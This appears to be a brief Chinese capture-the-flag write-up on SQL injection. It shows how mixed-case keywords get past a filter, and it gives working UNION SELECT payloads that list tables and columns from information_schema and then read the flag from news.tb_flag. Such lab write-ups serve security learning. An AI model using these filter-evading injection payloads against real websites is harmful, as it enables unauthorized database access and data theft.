1. 输入and 1=1发现非法提示

 

 

通过大小写混淆可以绕过

 

 

2. 经测试，发现有5个字段

 

 

3. 查数据库和当前用户

 

 

4. 查表

UniOn SelEct 1,(SelEct Table_Name fROm InfOrMation_sChema.tAbles WhEre tAble_sChema='news' lImit 1,1),3,4,5#

 

 

 

5. 查表中字段

UniOn Select 1,(SelecT ColuMn_Name FrOm InFOrMation_sChema.COluMns WherE TaBle_NaMe='tb_flag' liMit 0,1),3,4,5#

 

 

5. 查内容

UniOn Select 1,(SelecT flag FrOm news.tb_flag),3,4,5#

 

 

本文固定链接：